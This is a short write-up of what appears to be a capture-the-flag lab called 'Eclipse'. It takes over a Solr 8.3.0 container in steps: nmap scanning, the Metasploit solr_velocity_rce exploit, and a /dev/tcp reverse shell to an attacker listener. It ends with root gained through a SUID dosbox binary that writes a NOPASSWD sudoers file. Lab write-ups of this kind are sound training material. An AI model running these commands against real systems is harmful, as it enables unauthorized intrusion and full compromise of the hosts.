Skip to main content

Eclipse

This report details the exploitation of a Remote Code Execution (RCE) vulnerability in Apache Solr 8.3.0, leading to a reverse shell and subsequent privilege escalation to root using a SUID binary.

Reconnaissance

export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
8983/tcp open  unknown
nmap -p 8983 -sV -sC $TARGET_IP
PORT     STATE SERVICE VERSION
8983/tcp open  http    Apache Solr
| http-title: Solr Admin
|_Requested resource was http://172.17.0.2:8983/solr/

Web Service Enumeration

Visiting http://172.17.0.2:8983/solr/ in a web browser reveals the Apache Solr admin panel and the specific version in use: 8.3.0.

Exploitation

A search for known exploits targeting Apache Solr 8.3.0 reveals a critical RCE vulnerability associated with the Velocity template engine, commonly referred to as solr_velocity_rce.

We utilize Metasploit Framework to leverage the exploit/multi/http/solr_velocity_rce module:

msfconsole -q
search solr
use exploit/multi/http/solr_velocity_rce

Exploit Configuration

The exploit is configured with the target's IP address, and a local port for the reverse shell connection:

set RHOSTS 172.17.0.2    # Target IP address
set LHOST 172.17.0.1     # Attacker IP address
set LPORT 4444          # Local port for reverse shell

The exploit is launched:

exploit

Result: A successful exploit results in a Meterpreter shell, granting us interactive access to the target system.

Post-Exploitation

We enumerate potential privilege escalation vectors by searching for SUID binaries:

meterpreter > shell

Prepare the listener in your attacker machine in order to get the reverse shell and have the terminal available for the following commands:

nc -lvnp 4445

In victim's machine:

script /dev/null -c bash
sh -i >& /dev/tcp/172.17.0.1/4445 0>&1

Once we get the reverse shell proceed to the shell sanitization:

script /dev/null -c bash
# CTRL + Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty size
stty rows <ROWS> columns <COLUMNS>
find / -perm -4000 2>/dev/null

Output:

...
/usr/bin/dosbox

https://gtfobins.github.io/gtfobins/dosbox/

LFILE='/etc/sudoers.d/NINHACK'
/usr/bin/dosbox -c 'mount c /' -c "echo ninhack ALL=(ALL) NOPASSWD: ALL >c:$LFILE" -c exit
sudo su
id
> uid=0(root) gid=0(root) groups=0(root)